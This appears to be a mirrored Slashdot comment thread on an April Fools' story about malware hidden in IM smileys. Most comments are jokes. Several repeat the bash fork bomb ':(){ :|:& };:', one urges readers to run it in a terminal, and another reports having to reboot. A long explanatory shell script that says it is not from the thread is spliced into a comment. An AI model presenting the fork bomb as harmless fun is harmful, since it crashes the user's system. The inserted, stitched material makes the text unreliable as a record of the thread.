Slashdot Mirror


Instant Messaging Vulnerable To New Smiley Attacks

titus writes "Security researchers Yoann Guillot and Julien Tinnes have found a way to encode malicious code into smileys and provided a proof of concept encoder to automate the process. The researchers said their discovery paves the way for IM malware that would be impossible to detect since the malicious code would be 'indistinguishable from genuine chat messages.' I've tested the proof of concept code which works very well. Time to panic?"

49 of 170 comments

  1. Virus Smiles!?! by Anonymous Coward · · Score: 4, Funny

    Uh-oh, I knew all those 14 year old girls were really 1337 ha>0rz...

    1. Re:Virus Smiles!?! by Leafheart · · Score: 5, Funny

      I thought that was the reason for all the "Download best smiles EVER for MSN" links I saw around.

      --
      --- "When you gotta do something wrong. You gotta do it right. (Fighter)"
    2. Re:Virus Smiles!?! by ShadowBlasko · · Score: 2, Funny

      There are no girls on instant messenger... You know that!

      --
      There are 4 boxes to use in the defense of liberty: soap, ballot, jury, ammo. Use in that order- Ed Howdershelt Via Tass
    3. Re:Virus Smiles!?! by Nukenbar · · Score: 2

      Were they sending this? :(){ :|:& };:

    4. Re:Virus Smiles!?! by sunami88 · · Score: 5, Funny

      Dad: Who hacked us!?

      Granny: idk my bff jill?

      I'll go kill myself now.

      --
      Sex. Drugs, and Unix.
    5. Re:Virus Smiles!?! by collinstocks · · Score: 3, Informative

      It is not wise to post such things... there are people who actually would paste that into a terminal despite your warning.

      The way it works is as follows: :(){ something } # this is a valid function declaration which does something
      program1|program2 # this runs both program1 and program2, and pipes the output of one to the other
      command& # this runs a command in the background (i.e. non-blocking)
      ; # this is a line break
      : # this is a valid function call

      So, it makes a recursive function which calls itself twice from within the body of the code. Since it calls itself non-blocking, there is no infinite recursion error. On the next line, it calls the function.

      So, each parent function call spawns two children, and each child spawns two children, et cetera. This can easily bring down a system that is not securely configured (that is, most systems).
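The one-liner explained above (and posted again further down the thread) works by recursion plus `&`, so the process tree doubles at every level. As an added example, not code from the thread, here is a bounded version that builds the same binary tree but stops at a fixed depth, so it can be counted rather than left to fill the process table, together with a check of the per-user process limit that bounds the real thing. It approximates `:|:` (two processes per level, one for each side of the pipe) with two background calls; function names, the temp-file bookkeeping and the suggested limit value are my own choices.

```shell
#!/bin/sh
# Added example (not from the Slashdot thread): a self-terminating stand-in for
# :(){ :|:& };: that records one file per process instead of recursing forever.

# bomb_tree DEPTH DIR: register this process as a file in DIR, then, if DEPTH
# is still positive, spawn two children in the background (the two processes
# that ":|:&" creates per level in the original) and wait for them to finish.
bomb_tree() {
    depth=$1
    dir=$2
    # mktemp yields a unique name per invocation, i.e. one file per PID
    mktemp "$dir/proc.XXXXXX" >/dev/null || return 1
    if [ "$depth" -gt 0 ]; then
        bomb_tree $((depth - 1)) "$dir" &
        bomb_tree $((depth - 1)) "$dir" &
        wait
    fi
}

# expected_nodes DEPTH: a full binary tree of that depth has 2^(DEPTH+1) - 1
# nodes, which is how many processes the unbounded bomb has created by then.
expected_nodes() {
    echo $(( (1 << ($1 + 1)) - 1 ))
}

# count_tree DEPTH: run the bounded tree in a scratch directory and print the
# number of processes it actually spawned.
count_tree() {
    tmp=$(mktemp -d) || return 1
    bomb_tree "$1" "$tmp"
    n=$(find "$tmp" -type f | wc -l)
    rm -rf "$tmp"
    echo $((n + 0))   # arithmetic strips the padding some wc builds emit
}

# nproc_guard: the limit that stops a real fork bomb is the per-user process
# cap. "unlimited" is the "not securely configured" case from the comment;
# set it per session with `ulimit -u 2000` or persistently via pam_limits,
# e.g. "* hard nproc 2000" in /etc/security/limits.conf (2000 is an
# illustrative value, tune for the host).
nproc_guard() {
    limit=$(ulimit -u)
    if [ "$limit" = "unlimited" ]; then
        echo "WEAK: no per-user process limit (ulimit -u unlimited)"
        return 1
    fi
    echo "OK: per-user process limit is $limit"
    return 0
}

# Usage: depth 3 spawns 15 processes; a depth of 20 would be about a million,
# which is why the real one-liner is never run unbounded.
echo "spawned $(count_tree 3) processes, expected $(expected_nodes 3)"
nproc_guard
```

The depth parameter is the only difference from the original: strip it and the `wait`, and you are back to the one-liner. On a host where `nproc_guard` reports unlimited, the one-liner will run until `fork()` fails for every user on the box.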

  2. Take that! :-) by betterunixthanunix · · Score: 5, Funny

    And that! :-) (-:

    --
    Palm trees and 8
  3. :) and :-) by superpaladin · · Score: 2, Interesting

    which is safer?

    1. Re::) and :-) by VeNoM0619 · · Score: 2, Funny

      Not the ugly one, that's for sure, otherwise you find yourself handcuffed to a bed with a hangover.

      --
      Disclaimer: I am not god.
      We may not be created equal
      But we can be treated equal.
  4. In the spirit by tsstahl · · Score: 2, Insightful

    For the love of all that's decent, make it stop!

    Publishing these holes only encourages further malicious activity!

  5. Mom was right. by rackserverdeals · · Score: 4, Funny

    Smiles are contagious.

    --
    Dual Opteron < $600
    1. Re:Mom was right. by koterica · · Score: 2, Funny

      So is herpes. A coincidence? I think not.

  6. Re:Very.. by Brett+Buck · · Score: 4, Funny

    Yeah, opening for Kathy Griffin.

          April Fools Day is always a great opportunity to see that computer nerd humor is every bit as good as computer nerd social skills and personal hygiene.

            Brett

  7. Stop. Really, just stop by arkham6 · · Score: 4, Insightful

    Please? OK? One or two stories is acceptable, even if they are not funny. Multiple stories each year is just annoying.

    1. Re:Stop. Really, just stop by MobileTatsu-NJG · · Score: 5, Insightful

      Flamebait??? He's spot on. Mod him "goddamn right!"

      Slashdot is operational 364 days a year. One day of silliness and it's BITCHBITCHBITCHBITCHBITCH. Your problem's between the chair and the keyboard.

      --

      "I like to lick butts!" by MobileTatsu-NJG (#32700246) (Score:5, Informative)

    2. Re:Stop. Really, just stop by poena.dare · · Score: 4, Funny

      Your problem's between the chair and the keyboard.

      Nothing wrong with my penis. What you talkin about Willis?

    3. Re:Stop. Really, just stop by bitt3n · · Score: 3, Insightful

      the real amusement here is watching all the hissy fits these joke articles cause by momentarily interrupting weighty discussions on the legal implications of copyrighting a cloud pattern, or whether Steve Jobs should pop that zit on his chin.

    4. Re:Stop. Really, just stop by blackfrancis75 · · Score: 5, Informative

      Slashdot is operational 364 days a year.

      actually 364.24222 days a year .. and you call yourself a nerd?

    5. Re:Stop. Really, just stop by Anonymous Coward · · Score: 2, Insightful

      Slashdot is operational 364 days a year. One day of silliness and it's BITCHBITCHBITCHBITCHBITCH.

      In other words, no different than the other 364 days.

  8. Virus Variant by JerryLove · · Score: 5, Funny

    As I understand it, there is already a variant out undetectable to anti-smiley software as it embeds itself in a frowny-face.

    I wonder if it's transmittable on a discussion board as well? :(

  9. My favorite holiday by Weaselmancer · · Score: 3, Insightful

    "Slashdot Is Broken Day!"

    Oh please, please someone post a release date for Duke Nukem Forever! Or a story about how Microsoft is publishing their source code base under the GPL.

    IT'S NOT TIRED AND BORING AT ALL.

    --
    Weaselmancer
    rediculous.
    1. Re:My favorite holiday by Dun+Malg · · Score: 2

      The only positive thing I can say about today is that it's better than it was a year or two ago, when every fucking story was a joke, and not a single one of them was even the slightest bit clever or believable. This one story at least has the obfuscation of assembly language to make it look plausible, and we have a real blurb about Conficker, so we're already ahead.

      --
      If a job's not worth doing, it's not worth doing right.
  10. Re:Take that! :-) by Jason+Levine · · Score: 5, Funny

    Ack! Now I'm :-) infected. How could :-) you go posting :-) such a virulent :-) virus where :-) everyone could see i:-)t? I thin:-)k th:-)e inf:-)ect:-)ion's g:-)et:-)tin:-)g wo:-)rs:-)e n:-)o:-)w. I:-)'m of:-)f t:-)o pa:-)t:-)ch:-) m:-)y s:-)ys:-)te:-)m. :-):-):-):-):-)

    --
    My sci-fi novel, Ghost Thief, is now available from Amazon.com.
  11. More fun with smilies... by 6Yankee · · Score: 4, Funny

    I've always thought that it would be far more fun to get into someone's system (actually, lots of people's systems) and replace the smiley images. You send :) and, instead of getting a smiley face, they see an image that contains a sexually explicit proposition in the default MSN font. Imagine the chaos.

    Fortunately for the world, I can't write viruses. :D

    1. Re:More fun with smilies... by EkriirkE · · Score: 3, Funny

      :O -> goatse.jpg
      :O~ -> tubgirl.jpg
      :x -> lemonparty.jpg
      :S -> meatspin.gif

      --
      from 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
      to 45 2F 6E 40 3C DF 10 71 4E 41 DF AA 25 7D 31 3F
  12. :(){ :|:& };: anyone? by TinBromide · · Score: 5, Informative

    :(){ :|:& };:

    There, punch that into your terminal and see the power of the smiley.

    --
    Is it sad that I am more likely to recognize you and your posts by your sig than your name or UID?
  13. This is the one to watch out for by thetoadwarrior · · Score: 3, Funny

    8===D

    It always leads to trouble.

    1. Re:This is the one to watch out for by Friday · · Score: 2, Funny

      I'm more concerned with this one:

      8===D (!)

      Stay away from my @ss!!

      Or it'll end up looking like this.. =(*)=

      -- Never thought I'd get to use the goatse emoticon in a real posting ;)

  14. Bugtraq by just_another_sean · · Score: 3, Insightful

    I received this in a bugtraq message earlier and just ignored it, thinking huh, I should read that later. Having read it here I went back and checked it out in full. Did anyone actually run the Ruby code attached to the blog/bugtraq?

    --
    Creationist Textbook Stickers Declared Unconstitutional by CowboyNeal
  15. The problem with /. April fool's... by PinkyDead · · Score: 5, Insightful

    ...is that some of the real stories are less plausible.

    --
    Genesis 1:32 And God typed :wq!
  16. Re:Very.. by Anonymous Coward · · Score: 3, Funny

    "computer nerd... every bit"

    har har

  17. So? by CopaceticOpus · · Score: 2, Interesting

    That's nothing, I can insert malicious code into the space between those smileys.

  18. obligatory xkcd by WhiteDragon · · Score: 4, Funny
    --
    Did you mount a military-grade, variable-focus MASER on an unlicensed artificial intelligence?
    1. Re:obligatory xkcd by Kozz · · Score: 2, Informative

      It's a basilisk.

      --
      I only post comments when someone on the internet is wrong.
  19. STOP PRESS! Slashcode is also vulnerable! by daybot · · Score: 2, Funny

    :O

  20. Warning! by digitac · · Score: 3, Funny

    Slashdot vulnerable to lame April Fools' jokes! Cease using immediately for at least 24 hours.

    This message brought to you by the Association of Simpleminded Slashdot Humor Adversion Team

  21. Did anyone actually run the code? by fader · · Score: 2, Interesting

    I'm paranoid, as my idea of a good AFJ would be publishing genuinely malicious code as joke malicious code.

    --
    - fader
  22. You know... by WarpCode · · Score: 3, Funny

    Regardless of it being a harmless April Fools' joke, Symantec is probably already working on a "Smiley Face Blocker".... And people will buy it...

    1. Re:You know... by K.+S.+Kyosuke · · Score: 2, Funny

      And then they will repackage it as Emoticon Exterminator Enterprise Edition...and corporations will buy it...

      --
      Ezekiel 23:20
  23. Re:Awesome by GMFTatsujin · · Score: 5, Funny

    ^_^

  24. Bobby McFerrin says: by FelixNZ · · Score: 3, Funny

    Don't worry about your data, be :)

  25. I can just imagine... by soapdog · · Score: 2

    You go typing: "I <3 you" and Norton pops up... the horror, the horror...

    --
    -- Por mais que eu ande no vale das trevas e da morte, meu PowerMac G4 Não Travará!!!
  26. Re:Take that! :-) by shadowbearer · · Score: 2

    *grin*

    --
    It's old. The more humans I meet, the more I like my cats. At least they are honest.
  27. Re:Take that! :-) by lahvak · · Score: 2, Funny

    You can use a good programming editor when posting, something with syntax highlighting and parens/smilies matching to keep your smilies properly balanced.

    I guess the way the infection works is you put so many smilies to make the message look like some sort of Lisp code. The IM software gets confused, starts a Lisp interpreter to make some sense of it, the unbalanced parentheses cause a buffer overflow in the parser, ...

    --
    AccountKiller
  28. While this may well be a joke... by Wiseleo · · Score: 4, Informative

    ...in reality there are 3rd party smiley add-ons that work with IM software. You can recognize them by the "Your buddy sent you a smiley, to see it you need to install X software" type of IMs.

    That software is not exactly good for your computer either.

    For example: http://emoticons.smileycentral.com/yahoo-smileys.jsp

    And its EULA http://helpint.mywebsearch.com/intlinfo/eula/eula.jhtml

    Choice quotes from EULA

    UNIFIED REGISTRATION: As a service to our users, we may consolidate registration data for Webfetti, My Fun Cards, Kazulah, Smiley Central and certain other specified websites, services or applications accessible via the Toolbar, so that users are only required to provide registration information once, and would then be able to use the same unique ID and password to access all such websites, services or applications.

    Passwords. In order to access certain services, you may be required to accept additional terms and conditions and/or establish an account including an unique ID and password

    After reading that EULA, which references a bunch of other EULAs... that's enough to send my head spinning.

    --
    Leonid S. Knyshov
    Find me on Quora :)
  29. This is real you guys by wiedzmin · · Score: 2, Funny

    This is not a hoax, this is real you guys... I'm cereal!

    --
    Bow before me, for I am root.
  30. Dammit by nog_lorp · · Score: 2, Insightful

    I stared at the PoC and the outputs wondering how the fuck they thought this was supposed to actually be run by the target, before remembering what day it was.

  31. Re:crap anyone? by Anonymous Coward · · Score: 2, Funny

    that wasn't fun at all. I had to restart my computer. I specifically got ubuntu windows instead of microsoft because of this kind of crap!

  32. Re:Geek License Revocation. by fractoid · · Score: 2, Insightful

    Fork bomb? I thought it was a smiley threesome.

    Then all of the participants had lots of kids. Lots and lots and lots of kids.

    --
    Rampant carbon sequestration destroyed the Dinosaurs' tropical paradise. I'm here to help repair the damage.